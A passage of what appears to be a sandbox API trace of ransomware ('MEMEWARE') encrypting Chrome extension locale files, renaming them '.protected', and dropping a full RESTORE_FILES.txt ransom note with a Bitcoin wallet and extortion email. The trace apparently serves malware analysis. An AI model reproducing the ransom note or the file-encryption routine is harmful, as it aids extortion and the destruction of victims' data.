hFindFile=0x47bc10) returned 1 [0079.474] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 160 [0079.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.474] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.474] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.475] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.475] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.475] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.475] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.476] CloseHandle (hObject=0x164) returned 1 [0079.476] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.476] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.476] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk") returned 142 [0079.476] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.476] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*") returned 144 [0079.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.476] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.476] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\.") returned 144 [0079.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.477] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\..") returned 145 [0079.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.477] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.477] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.477] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.477] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.477] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.477] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.477] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json") returned 156 [0079.479] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.479] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0079.480] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.480] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0079.481] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.481] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.481] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.481] CloseHandle (hObject=0x168) returned 1 [0079.481] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected") returned 166 [0079.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.482] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.482] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.482] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 160 [0079.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.483] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.483] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.485] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.485] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.485] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.485] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.485] CloseHandle (hObject=0x164) returned 1 [0079.485] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.485] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.485] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl") returned 142 [0079.486] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.486] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*") returned 144 [0079.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\.") returned 144 [0079.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.486] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.486] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.486] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\..") returned 145 [0079.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.487] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.487] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.487] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json") returned 156 [0079.488] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0079.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 
[0079.489] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.489] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.490] CloseHandle (hObject=0x168) returned 1 [0079.490] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected") returned 166 [0079.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.491] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.491] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.491] wnsprintfW (in: 
